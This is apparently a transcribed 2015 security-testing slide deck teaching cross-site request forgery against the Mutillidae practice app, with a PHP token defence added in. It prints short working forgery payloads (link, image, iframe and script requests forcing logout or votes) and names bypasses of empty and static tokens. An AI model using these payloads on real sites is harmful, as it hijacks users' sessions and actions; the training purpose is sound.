OH NO, WAS THAT CSRF ? Abhinav Sejpal
Post on 12-Aug-2015

WHO AM I

I'm a new Generation Exploratory Tester

Researcher & Reader in free time

Speaker at Null & OWASP Community

Facilitator at Weekend Testing

Crowd Tester (AKA. Bug bounty Hunter)

Reported Security Vulnerabilities for 50+ unique customers all over the world, including Apple, yahoo, Outlook, adobe & etc.

Proficient at Functional, Usability, Accessibility & Compatibility Testing

Love to develop nasty code & Hack it :)

Works as Quality Analyst at passbrains.com, AKA. Bug Wrangler

~Publication ~

DISCLAIMER

This Presentation is intended for educational purposes only and I cannot be held liable for any kind of damages done whatsoever to your machine, or other damages. Please - Don't try this attack on any other system without having context knowledge or permission; this may harm someone directly or indirectly.

Feel free to use this presentation for practice or education purpose.

^ I hope - You gotcha ^

SOCIAL MEDIA FEED

Hashtag for this session: #BitzNightTesting, #CSRF

Twitter handle for feedback: @weekendtesting, @Abhinav_Sejpal

G+: http://goo.gl/kMAOs1

AGENDA

* Introduction

* Set up Pen Testing LAB

* Overview of HTTP Request

* Intercept the HTTP Request using Proxy (MITM)

* Understanding cross site attacks

* Testing for a cross site request forgery risk

* Attack: Anti-forgery Attacks

* Common Defences Against CSRF

TARGETED APPLICATION

Client Side language : HTML & Javascript

Server side Language: PHP

DB : MYSQL

Why PHP ? - Any answer Here?

Why MySQL? MySQL is the Girlfriend of PHP <3

http://w3techs.com/technologies/overview/programming_language/all

PHP IS USED BY 82.2% OF ALL THE WEBSITES AS SERVER-SIDE PROGRAMMING LANGUAGE.

PHP: 244M SITES

2.1M IP ADDRESSES

2013 Server-side Programming Language of the Year

Don't Mind Power of PHP > Facebook & yahoo 

http://w3techs.com/blog/entry/web_technologies_of_the_year_2013

PLAY GROUND

MUTILLIDAE

It's a free, open source web application provided to allow security enthusiasts to pen-test and hack a web application.

V.2X developed by Jeremy Druin aka webpwnized.

ALL SET WITH MUTILLIDAE ?

AM I VULNERABLE TO 'CSRF' ?

OWASP A8 - CSRF

CROSS-SITE REQUEST FORGERY

Facebook Post

Linkedin Panel

HOW WEB WORKS ?

' Send Request '

Proxy (Man in the middle)

Intercept Request & Response from client

CSRF ATTACK CYCLE

CSRF AKA. XSRF

THE ATTACKER EXPLOITS THE TRUST A WEBSITE HAS IN A USER'S BROWSER.

* Permission faking \ stealing

* Disruption of the normal sequence of the site

http://127.0.0.1/xampp/mutillidae/index.php?do=logout

DEMO #1

Login ID - admin

password - adminpass

HTTP GET Request

<a href=" "> </a>

: ANSWER DEMO 1 :

<html>
<title> CSRF Demo 1 </title>
<a href="http://127.0.0.1/xampp/mutillidae/index.php?do=logout"> Click me </a>
</html>

Yes it's not dangerous but annoying

UNDERSTANDING

Logout page has a simple HTTP GET that requires no confirmation.

Every user who visited that page would immediately be logged out - that's CSRF in action.

SO WHAT DO YOU THINK, IS IT ALL ABOUT THE CLICK ?

Shh, No!!

Would you like to write a CSRF exploit without a click ??

<img src=" ">

CSRF GET Request with Image Tag

<html>
<title> CSRF Demo 1 </title>
<img src="http://127.0.0.1/xampp/mutillidae/index.php?do=logout">
</html>

HTTP REQUEST

<iframe src="http://127.0.0.1/xampp/mutillidae/index.php?do=logout"></iframe>

<script>
  var X = new Image();
  X.src = "http://127.0.0.1/xampp/mutillidae/index.php?do=logout";
</script>

<html>
<title> CSRF Demo 1 </title>
<a href="http://127.0.0.1/xampp/mutillidae/index.php?do=logout"> Click me </a>
</html>

:: SOLUTION #1 ::

http://127.0.0.1/xampp/mutillidae/index.php?page=user-poll.php&csrf-token=&choice=nmap&initials=n&user-poll-php-submit-button=Submit+Vote

IS IT EASY TO CREATE A CSRF HTTP REQUEST ?

No - you should try out IronWASP

CSRF PoC Generator - Tool for automatically generating exploits for CSRF vulnerabilities

* One Click POC *

* Hybrid automation *

thanks a ton to Lava & Jayesh 

CHALLENGE  #3

Add user without admin's knowledge

LIVE CHALLENGE

* SIGNUP DISABLED * PLEASE USE THE USERNAME TEST AND THE PASSWORD TEST

CSRF & XSRF

Update the user info. without their knowledge

http://testphp.vulnweb.com/userinfo.php

Can we exploit this with Level #2 ?

You've been CSRF'd with static token! 

Let's try with Level - 3

~ Keep Hacking your Code ~

There is no silver bullet to stop this - Just Trust your code
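The levels above show what separates a bypassable token from a working one: an empty csrf-token= that the server waves through, and a static token the attacker can copy. The following is an added PHP 7.1+ example written for this page (not Mutillidae's own code) that guards the user-poll form with a per-session random token; the field names are taken from the demo URL, and the session key and function names are assumptions.

```php
<?php
// Added example (not from the slides or Mutillidae): per-session,
// unpredictable anti-CSRF token for the user-poll form, plus the checks
// that defeat the empty-token and static-token tricks from the demo.
session_start();

// Create the token once per session. random_bytes() is CSPRNG-backed, so
// the value cannot be guessed or copied the way a static token can.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Accept a submitted token only when the session holds one AND the
// submitted value matches it exactly. A missing or blank parameter
// (the "csrf-token=" seen in the demo URL) is rejected outright.
function csrf_verify(?string $submitted): bool {
    if ($submitted === null || $submitted === '' || empty($_SESSION['csrf_token'])) {
        return false;
    }
    // hash_equals() compares in constant time, so the token is not
    // leaked byte by byte through response timing.
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    // State changes happen only on POST; the <a>/<img>/<iframe> GET
    // requests from the demos never reach this branch.
    if (!csrf_verify($_POST['csrf-token'] ?? null)) {
        http_response_code(403);
        exit('Invalid or missing anti-CSRF token');
    }
    // ... record the vote for $_POST['choice'] here ...
}
?>
<form method="POST" action="index.php?page=user-poll.php">
  <input type="hidden" name="csrf-token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>">
  <label>Tool: <input type="text" name="choice" value="nmap"></label>
  <label>Initials: <input type="text" name="initials" maxlength="3"></label>
  <button type="submit" name="user-poll-php-submit-button">Submit Vote</button>
</form>
```

The token is tied to the victim's session, so a page on another origin cannot read it to build a matching request; the hidden field is HTML-escaped so the token cannot break out of the attribute.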

POPULAR COOL FINDINGS

by Amol Facebook CSRF worth USD 5000

GOOGLE GROUPS PROFILE CSRFGoogle Account display pic deletion

Facebook Account deactivation

Advanced Learnings - CSRF Token Validation Fail

http://haiderm.com/csrf-token-protection-bypass-methods/

INDIAN HACKERS/INFOSEC GUYS & GROUPS YOU

SHOULD BE FOLLOWING IN TWITTER

Thank-you http://garage4hackers.com/ community

- Twitter Folks -

@riyazwalikar, @TroyHunt, @yog3sharma, @makash & @anatshri

CREDITS

Big thank You to @weekendtesting, @srinivasskc & you All.

YES - I'M DONE!

Feel free to write me at bug.wrangler at outlook.com

LICENSE AND COPYRIGHTS

https://slides.com/abhinavsejpal/weekend-testing-csrf

copyrights 2013-2014 Abhinav Sejpal

-----

  ( CC BY-NC-ND 3.0)

Attribution-NonCommercial-NoDerivs 3.0 Unported

  Dedicated to my lovely daddy